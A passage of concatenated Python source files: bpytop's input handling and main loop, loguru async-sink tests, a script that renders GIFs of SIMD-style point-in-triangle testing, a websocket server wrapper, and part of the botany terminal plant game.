if list(Box.view_modes).index(Box.view_mode) + 1 > len(list(Box.view_modes)) - 1:
Box.view_mode = list(Box.view_modes)[0]
else:
Box.view_mode = list(Box.view_modes)[(list(Box.view_modes).index(Box.view_mode) + 1)]
CONFIG.shown_boxes = " ".join(Box.view_modes[Box.view_mode])
Draw.clear(saved=True)
Term.refresh(force=True)
elif key in box_keys:
boxes = CONFIG.shown_boxes.split()
if box_keys[key] in boxes:
boxes.remove(box_keys[key])
else:
boxes.append(box_keys[key])
CONFIG.shown_boxes = " ".join(boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
Term.refresh(force=True)
else:
found = False
if found: continue
if "proc" in Box.boxes:
if key in ["left", "right"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "f":
ProcBox.filtering = True
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key.lower() in ["t", "k", "i"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key.lower() == "t": sig = signal.SIGTERM
elif key.lower() == "k": sig = signal.SIGKILL
elif key.lower() == "i": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
Collector.proc_counter = 1
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
Collector.proc_counter = 1
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect"]:
ProcBox.selector(key, mouse_pos)
if "net" in Box.boxes:
if key in ["b", "n"]:
NetCollector.switch(key)
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
if "mem" in Box.boxes:
if key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "d":
Collector.collect_idle.wait()
CONFIG.show_disks = not CONFIG.show_disks
Collector.collect(MemCollector, interrupt=True, redraw=True)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
|
test_coroutine_sink.py
|
import asyncio
import logging
import multiprocessing
import re
import sys
import threading
import loguru
import pytest
from loguru import logger
async def async_writer(msg):
await asyncio.sleep(0.01)
print(msg, end="")
class AsyncWriter:
async def __call__(self, msg):
await asyncio.sleep(0.01)
print(msg, end="")
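# Note added for clarity (not part of the original test suite): the tests below all
# follow the same pattern. An async sink (a coroutine function such as async_writer,
# or an object with an async __call__ like AsyncWriter) is registered with
# logger.add(); each log call schedules the sink on the event loop, and
# "await logger.complete()" is what actually waits for those scheduled writes to
# finish before the assertions inspect the captured output.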
def test_coroutine_function(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
logger.add(async_writer, format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_async_callable_sink(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
logger.add(AsyncWriter(), format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_concurrent_execution(capsys):
async def task(i):
logger.debug("=> {}", i)
async def main():
tasks = [task(i) for i in range(10)]
await asyncio.gather(*tasks)
await logger.complete()
logger.add(async_writer, format="{message}")
asyncio.run(main())
out, err = capsys.readouterr()
assert err == ""
assert sorted(out.splitlines()) == sorted("=> %d" % i for i in range(10))
def test_recursive_coroutine(capsys):
async def task(i):
if i == 0:
await logger.complete()
return
logger.info("{}!", i)
await task(i - 1)
logger.add(async_writer, format="{message}")
asyncio.run(task(9))
out, err = capsys.readouterr()
assert err == ""
assert sorted(out.splitlines()) == sorted("%d!" % i for i in range(1, 10))
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_using_another_event_loop(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_run_multiple_different_loops(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
logger.add(async_writer, format="{message}", loop=None)
asyncio.run(worker(1))
asyncio.run(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_run_multiple_same_loop(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker(1))
loop.run_until_complete(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
def test_using_sink_without_running_loop_not_none(capsys):
loop = asyncio.new_event_loop()
logger.add(sys.stderr, format="=> {message}")
logger.add(async_writer, format="{message}", loop=loop)
logger.info("A message")
loop.run_until_complete(logger.complete())
out, err = capsys.readouterr()
assert err == "=> A message\n"
assert out == "A message\n"
def test_using_sink_without_running_loop_none(capsys):
loop = asyncio.new_event_loop()
logger.add(sys.stderr, format="=> {message}")
logger.add(async_writer, format="{message}", loop=None)
logger.info("A message")
loop.run_until_complete(logger.complete())
out, err = capsys.readouterr()
assert err == "=> A message\n"
assert out == ""
def test_global_loop_not_used(capsys):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(sys.stderr, format="=> {message}")
logger.add(async_writer, format="{message}", loop=None)
logger.info("A message")
loop.run_until_complete(logger.complete())
out, err = capsys.readouterr()
assert err == "=> A message\n"
assert out == ""
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_complete_in_another_run(capsys):
async def worker_1():
logger.debug("A")
async def worker_2():
logger.debug("B")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker_1())
loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\nB\n"
assert err == ""
def test_tasks_cancelled_on_remove(capsys):
logger.add(async_writer, format="{message}", catch=False)
async def foo():
logger.info("A")
logger.info("B")
logger.info("C")
logger.remove()
await logger.complete()
asyncio.run(foo())
out, err = capsys.readouterr()
assert out == err == ""
def test_remove_without_tasks(capsys):
logger.add(async_writer, format="{message}", catch=False)
logger.remove()
async def foo():
logger.info("!")
await logger.complete()
asyncio.run(foo())
out, err = capsys.readouterr()
assert out == err == ""
def test_complete_without_tasks(capsys):
logger.add(async_writer, catch=False)
async def worker():
await logger.complete()
asyncio.run(worker())
out, err = capsys.readouterr()
assert out == err == ""
def test_complete_stream_noop(capsys):
logger.add(sys.stderr, format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
out, err = capsys.readouterr()
assert out == ""
assert err == "A\nB\nC\nD\n"
def test_complete_file_noop(tmpdir):
filepath = tmpdir.join("test.log")
logger.add(str(filepath), format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
assert filepath.read() == "A\nB\nC\nD\n"
def test_complete_function_noop():
out = ""
def write(msg):
nonlocal out
out += msg
logger.add(write, format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
assert out == "A\nB\nC\nD\n"
def test_complete_standard_noop(capsys):
logger.add(logging.StreamHandler(sys.stderr), format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
out, err = capsys.readouterr()
assert out == ""
assert err == "A\nB\nC\nD\n"
def test_exception_in_coroutine_caught(capsys):
async def sink(msg):
raise Exception("Oh no")
async def main():
logger.add(sink, catch=True)
logger.info("Hello world")
await asyncio.sleep(0.1)
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
lines = err.strip().splitlines()
assert out == ""
assert lines[0] == "--- Logging error in Loguru Handler #0 ---"
assert re.match(r"Record was: \{.*Hello world.*\}", lines[1])
assert lines[-2] == "Exception: Oh no"
assert lines[-1] == "--- End of logging error ---"
def test_exception_in_coroutine_not_caught(capsys, caplog):
async def sink(msg):
raise ValueError("Oh no")
async def main():
logger.add(sink, catch=False)
logger.info("Hello world")
await asyncio.sleep(0.1)
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
assert out == err == ""
records = caplog.records
assert len(records) == 1
record = records[0]
message = record.getMessage()
assert "Logging error in Loguru Handler" not in message
assert "was never retrieved" not in message
exc_type, exc_value, _ = record.exc_info
assert exc_type == ValueError
assert str(exc_value) == "Oh no"
def test_exception_in_coroutine_during_complete_caught(capsys):
async def sink(msg):
await asyncio.sleep(0.1)
raise Exception("Oh no")
async def main():
logger.add(sink, catch=True)
logger.info("Hello world")
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
lines = err.strip().splitlines()
assert out == ""
assert lines[0] == "--- Logging error in Loguru Handler #0 ---"
assert re.match(r"Record was: \{.*Hello world.*\}", lines[1])
assert lines[-2] == "Exception: Oh no"
assert lines[-1] == "--- End of logging error ---"
def test_exception_in_coroutine_during_complete_not_caught(capsys, caplog):
async def sink(msg):
await asyncio.sleep(0.1)
raise ValueError("Oh no")
async def main():
logger.add(sink, catch=False)
logger.info("Hello world")
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
assert out == err == ""
records = caplog.records
assert len(records) == 1
record = records[0]
message = record.getMessage()
assert "Logging error in Loguru Handler" not in message
assert "was never retrieved" not in message
exc_type, exc_value, _ = record.exc_info
assert exc_type == ValueError
assert str(exc_value) == "Oh no"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_enqueue_coroutine_loop(capsys):
loop = asyncio.new_event_loop()
logger.add(async_writer, enqueue=True, loop=loop, format="{message}", catch=False)
async def worker():
logger.info("A")
await logger.complete()
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_enqueue_coroutine_from_inside_coroutine_without_loop(capsys):
loop = asyncio.new_event_loop()
async def worker():
logger.add(async_writer, enqueue=True, loop=None, format="{message}", catch=False)
logger.info("A")
await logger.complete()
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_custom_complete_function(capsys):
awaited = False
class Handler:
def write(self, message):
print(message, end="")
async def complete(self):
nonlocal awaited
awaited = True
async def worker():
logger.info("A")
await logger.complete()
logger.add(Handler(), catch=False, format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
assert awaited
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_complete_from_another_loop(capsys, loop_is_none):
main_loop = asyncio.new_event_loop()
second_loop = asyncio.new_event_loop()
loop = None if loop_is_none else main_loop
logger.add(async_writer, loop=loop, format="{message}")
async def worker_1():
logger.info("A")
async def worker_2():
await logger.complete()
main_loop.run_until_complete(worker_1())
second_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == err == ""
main_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_complete_from_multiple_threads_loop_is_none(capsys):
async def worker(i):
for j in range(100):
await asyncio.sleep(0)
logger.info("{:03}", i)
await logger.complete()
async def sink(msg):
print(msg, end="")
def worker_(i):
asyncio.run(worker(i))
logger.add(sink, catch=False, format="{message}")
threads = [threading.Thread(target=worker_, args=(i,)) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
out, err = capsys.readouterr()
assert sorted(out.splitlines()) == ["{:03}".format(i) for i in range(10) for _ in range(100)]
assert err == ""
def test_complete_from_multiple_threads_loop_is_not_none(capsys):
async def worker(i):
for j in range(100):
await asyncio.sleep(0)
logger.info("{:03}", i)
await logger.complete()
async def sink(msg):
print(msg, end="")
def worker_(i):
asyncio.run(worker(i))
loop = asyncio.new_event_loop()
logger.add(sink, catch=False, format="{message}", loop=loop)
threads = [threading.Thread(target=worker_, args=(i,)) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
async def complete():
await logger.complete()
loop.run_until_complete(complete())
out, err = capsys.readouterr()
assert sorted(out.splitlines()) == ["{:03}".format(i) for i in range(10) for _ in range(100)]
assert err == ""
async def async_subworker(logger_):
logger_.info("Child")
await logger_.complete()
async def async_mainworker(logger_):
logger_.info("Main")
await logger_.complete()
def subworker(logger_):
loop = asyncio.new_event_loop()
loop.run_until_complete(async_subworker(logger_))
class Writer:
def __init__(self):
self.output = ""
async def write(self, message):
self.output += message
def test_complete_with_sub_processes(monkeypatch, capsys):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
loop = asyncio.new_event_loop()
writer = Writer()
logger.add(writer.write, format="{message}", enqueue=True, loop=loop)
process = ctx.Process(target=subworker, args=[logger])
process.start()
process.join()
async def complete():
await logger.complete()
loop.run_until_complete(complete())
out, err = capsys.readouterr()
assert out == err == ""
assert writer.output == "Child\n"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_invalid_coroutine_sink_if_no_loop_with_enqueue():
with pytest.raises(ValueError):
logger.add(async_writer, enqueue=True, loop=None)
|
GenGifs.py
|
import os
import subprocess
import multiprocessing
import numpy as np
import itertools
from PIL import Image
from PIL import ImageDraw
TestTriangle = (
( 5, 5),
(95,40),
(30,95)
)
# Barycentric method
def PointInTriangle( Point, Triangle ):
V0 = tuple(np.subtract(Triangle[2], Triangle[0]))
V1 = tuple(np.subtract(Triangle[1], Triangle[0]))
V2 = tuple(np.subtract(Point , Triangle[0]))
Dot00 = np.dot(V0, V0)
Dot01 = np.dot(V0, V1)
Dot02 = np.dot(V0, V2)
Dot11 = np.dot(V1, V1)
Dot12 = np.dot(V1, V2)
Area = (Dot00 * Dot11 - Dot01 * Dot01)
U = (Dot11 * Dot02 - Dot01 * Dot12)
V = (Dot00 * Dot12 - Dot01 * Dot02)
return (U >= 0) & (V >= 0) & (U + V < Area)
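# Added note (not part of the original script): this is the barycentric test with
# the final division deferred. U and V are the barycentric coordinates scaled by
# Area, so the usual conditions u >= 0, v >= 0, u + v < 1 become
# U >= 0, V >= 0, U + V < Area without any division. For the TestTriangle above,
# Point = (30, 40) gives U/Area ~= 0.31 and V/Area ~= 0.19, so it is inside,
# while Point = (0, 0) gives a negative U and is rejected.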
def chunks(List, Widths):
i = 0
for CurWidth in Widths:
while i + CurWidth <= len(List):
yield List[i:i + CurWidth]
i += CurWidth
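# Added note (not part of the original script): chunks() walks the list with the
# widest granularity first and falls back to narrower widths for the remainder,
# mimicking how SIMD code handles full vector lanes before a scalar tail. For
# example, with Granularity [4, 1] and a 10-element list it yields two 4-wide
# chunks first and then 1-wide chunks for the leftover points.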
# Params:
# Name: Name of generated frames. Default "Serial"
# Path: Path for output images Default: "./frames/(Name)/"
# Size: Of the image, default (100,100)
# Scale: Scaling for the resulting image. Default: 2
# Granularity: List of widths in which elements may be processed in parallel
# Default: [1]
def RenderTriangle( Params ):
# Params
Name = Params.get("Name", "Serial")
Size = Params.get("Size", (100, 100))
Path = "./frames/" + Name + "/"
Scale = Params.get("Scale", 2)
Granularity = Params.get("Granularity", [1])
# Sort by largest to smallest
Granularity.sort()
Granularity.reverse()
# Create target path recursively
os.makedirs(Path, exist_ok=True)
# Create image
Img = Image.new('RGB', Size)
Draw = ImageDraw.Draw(Img)
# Generate each row of points up-front
Points = [
(x,y) for y in range(Size[1]) for x in range(Size[0])
]
i = 0
for CurPoints in chunks(Points,Granularity):
# Hilight the pixels being currently processed
# Hilight hits and misses
Hit = [(x,y) for (x,y) in CurPoints if PointInTriangle((x,y),TestTriangle)]
Miss = [(x,y) for (x,y) in CurPoints if not PointInTriangle((x,y),TestTriangle)]
Draw.point(
Hit,
fill=(0x00, 0xFF, 0x00)
)
Draw.point(
Miss,
fill=(0xFF, 0x00, 0x00)
)
Img.resize(
(Img.width * Scale, Img.height * Scale),
Image.NEAREST
).save(Path + Name + '_' + str(i).zfill(6) + ".png")
i += 1
# Save the "processed" frame
Draw.point(
Hit,
fill=(0xFF, 0xFF, 0xFF)
)
Draw.point(
Miss,
fill=(0x00, 0x00, 0x00)
)
Img.resize(
(Img.width * Scale, Img.height * Scale),
Image.NEAREST
).save(Path + Name + '_' + str(i).zfill(6) + ".png")
i += 1
subprocess.Popen(
[
'ffmpeg',
'-y',
'-framerate','50',
'-i', Path + Name + '_%06d.png',
Name + '.gif'
]
).wait()
Configs = [
# Serial
{
"Name": "Serial",
"Granularity": [1],
"Scale": 2,
"Size": (100, 100)
},
# SSE/NEON
{
"Name": "SSE-NEON",
"Granularity": [4,1],
"Scale": 2,
"Size": (100, 100)
},
# AVX2
{
"Name": "AVX2",
"Granularity": [8,4,1],
"Scale": 2,
"Size": (100, 100)
},
# AVX512
{
"Name": "AVX512",
"Granularity": [16,8,4,1],
"Scale": 2,
"Size": (100, 100)
}
]
Processes = [
multiprocessing.Process(
target=RenderTriangle, args=(Config,)
) for Config in Configs
]
for Process in Processes:
Process.start()
for Process in Processes:
Process.join()
|
websocket.py
|
# -*- coding:utf-8 -*-
import socket
# from multiprocessing import Process
from datetime import datetime
from websocket_server import WebsocketServer
from gsiot.v3 import *
from gsiot.v3.net.server import *
class webSockServer(gsIO):
def __init__(self,port,ip="0.0.0.0"):
gsIO.__init__(self,(ip,port))
self.ip=ip
self.port=port
self.istask=False
self.cmd=command_interpreter()
self.container=None
self.new_client=None
self.client_left=None
self.message_received=None
def __call__(self,cmdline,*argv,**keyargv):return self.do(cmdline,*argv,**keyargv)
def do(self,cmdline,*argv,**keyargv):
return self.cmd(cmdline,self if self.container==None else self.container,*argv,**keyargv)
def Open(self):
self.dev= WebsocketServer(self.port,self.ip)
self.dev.set_fn_new_client(self.new_client)
self.dev.set_fn_client_left(self.client_left)
self.dev.set_fn_message_received(self.message_received)
self.t=threading.Thread(target=self.dev.run_forever)
if __name__ != "lib.net.server.webserver.websocket" and __name__!="__main__":self.t.setDaemon(True)
self.t.start()
return True
def Close(self):
self.dev.close()
self.isOpen(False)
# except:pass #self.logservice("info","")
def send(self,msg,client=None):
# Pack the outgoing message into a frame
if msg!=None:
frame=edict()
if "cmd" in msg:frame.cmd=msg.cmd
if "type" in msg:frame.type=msg["type"]
frame.result=msg
frame.datetime=str(datetime.now())[:19]
if client!=None:
frame.id=client["id"]
try:self.dev.send_message(client,str(frame).replace("None","null").replace("True","true").replace("False","false").replace("u'","\"").replace("'","\""))
except:print(str(frame))
else:self.dev.send_message_to_all(str(frame).replace("None","null").replace("True","true").replace("False","false").replace("u'","\"").replace("'","\""))
if __name__ == "__main__":
serv=webCommand(9503)
print(serv.cmd.cmds)
serv.Open()
|
botany.py
|
#!/usr/bin/env python3
import time
import pickle
import json
import os
import random
import getpass
import threading
import errno
import uuid
import sqlite3
from menu_screen import *
# TODO:
# - Switch from personal data file to table in DB
class Plant(object):
# This is your plant!
stage_list = [
'seed',
'seedling',
'young',
'mature',
'flowering',
'seed-bearing',
]
color_list = [
'red',
'orange',
'yellow',
'green',
'blue',
'indigo',
'violet',
'white',
'black',
'gold',
'rainbow',
]
rarity_list = [
'common',
'uncommon',
'rare',
'legendary',
'godly',
]
species_list = [
'poppy',
'cactus',
'aloe',
'venus flytrap',
'jade plant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
mutation_list = [
'',
'humming',
'noxious',
'vorpal',
'glowing',
'electric',
'icy',
'flaming',
'psychic',
'screaming',
'chaotic',
'hissing',
'gelatinous',
'deformed',
'shaggy',
'scaly',
'depressed',
'anxious',
'metallic',
'glossy',
'psychedelic',
'bonsai',
'foamy',
'singing',
'fractal',
'crunchy',
'goth',
'oozing',
'stinky',
'aromatic',
'juicy',
'smug',
'vibrating',
'lithe',
'chalky',
'naive',
'ersatz',
'disco',
'levitating',
'colossal',
'luminous',
'cosmic',
'ethereal',
'cursed',
'buff',
'narcotic',
'gnu/linux',
'abraxan', # rip dear friend
]
def __init__(self, this_filename, generation=1):
# Constructor
self.plant_id = str(uuid.uuid4())
self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30)
# self.life_stages = (2, 4, 6, 8, 10) # debug mode
self.stage = 0
self.mutation = 0
self.species = random.randint(0,len(self.species_list)-1)
self.color = random.randint(0,len(self.color_list)-1)
self.rarity = self.rarity_check()
self.ticks = 0
self.age_formatted = "0"
self.generation = generation
self.dead = False
self.write_lock = False
self.owner = getpass.getuser()
self.file_name = this_filename
self.start_time = int(time.time())
self.last_time = int(time.time())
# must water plant first day
self.watered_timestamp = int(time.time())-(24*3600)-1
self.watered_24h = False
self.visitors = []
def migrate_properties(self):
# Migrates old data files to new
if not hasattr(self, 'generation'):
self.generation = 1
if not hasattr(self, 'visitors'):
self.visitors = []
def parse_plant(self):
# Converts plant data to human-readable format
output = ""
if self.stage >= 3:
output += self.rarity_list[self.rarity] + " "
if self.mutation != 0:
output += self.mutation_list[self.mutation] + " "
if self.stage >= 4:
output += self.color_list[self.color] + " "
output += self.stage_list[self.stage] + " "
if self.stage >= 2:
output += self.species_list[self.species] + " "
return output.strip()
def rarity_check(self):
# Generate plant rarity
CONST_RARITY_MAX = 256.0
rare_seed = random.randint(1, int(CONST_RARITY_MAX))
common_range = round((2.0/3)*CONST_RARITY_MAX)
uncommon_range = round((2.0/3)*(CONST_RARITY_MAX-common_range))
rare_range = round((2.0/3)*(CONST_RARITY_MAX-common_range-uncommon_range))
legendary_range = round((2.0/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range))
common_max = common_range
uncommon_max = common_max + uncommon_range
rare_max = uncommon_max + rare_range
legendary_max = rare_max + legendary_range
godly_max = CONST_RARITY_MAX
if 0 <= rare_seed <= common_max:
rarity = 0
elif common_max < rare_seed <= uncommon_max:
rarity = 1
elif uncommon_max < rare_seed <= rare_max:
rarity = 2
elif rare_max < rare_seed <= legendary_max:
rarity = 3
elif legendary_max < rare_seed <= godly_max:
rarity = 4
return rarity
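# Added note (not part of the original game code): the nested (2/3) splits above
# give a roughly geometric rarity distribution. With CONST_RARITY_MAX = 256 the
# ranges work out to approximately:
#   common    1..171   (~67%)
#   uncommon  172..228 (~22%)
#   rare      229..247 (~7%)
#   legendary 248..253 (~2%)
#   godly     254..256 (~1%)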
def dead_check(self):
# if it has been >5 days since watering, sorry plant is dead :(
time_delta_watered = int(time.time()) - self.watered_timestamp
if time_delta_watered > (5 * (24 * 3600)):
self.dead = True
return self.dead
def update_visitor_db(self, visitor_names):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
        for name in visitor_names:
            c = conn.cursor()
            # use bound parameters so odd characters in names can't break the SQL
            c.execute("SELECT * FROM visitors WHERE garden_name = ? AND visitor_name = ?",
                      (self.owner, name))
            data = c.fetchone()
            if data is None:
                c.execute("INSERT INTO visitors (garden_name, visitor_name, weekly_visits) VALUES (?, ?, 1)",
                          (self.owner, name))
            else:
                c.execute("UPDATE visitors SET weekly_visits = weekly_visits + 1 "
                          "WHERE garden_name = ? AND visitor_name = ?",
                          (self.owner, name))
conn.commit()
conn.close()
def guest_check(self):
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
visitor_filepath = os.path.join(botany_dir,'visitors.json')
guest_timestamps = []
visitors_this_check = []
if os.path.isfile(visitor_filepath):
with open(visitor_filepath, 'r') as visitor_file:
data = json.load(visitor_file)
if data:
for element in data:
if element['user'] not in self.visitors:
self.visitors.append(element['user'])
if element['user'] not in visitors_this_check:
visitors_this_check.append(element['user'])
                        # prevent users from manually setting watered_time in the future
                        if element['timestamp'] <= int(time.time()) and element['timestamp'] >= self.watered_timestamp:
                            guest_timestamps.append(element['timestamp'])
try:
self.update_visitor_db(visitors_this_check)
except:
pass
with open(visitor_filepath, 'w') as visitor_file:
visitor_file.write('[]')
else:
with open(visitor_filepath, mode='w') as f:
json.dump([], f)
os.chmod(visitor_filepath, 0o666)
if not guest_timestamps:
return self.watered_timestamp
all_timestamps = [self.watered_timestamp] + guest_timestamps
all_timestamps.sort()
# calculate # of days between each guest watering
timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])]
# plant's latest timestamp should be set to last timestamp before a
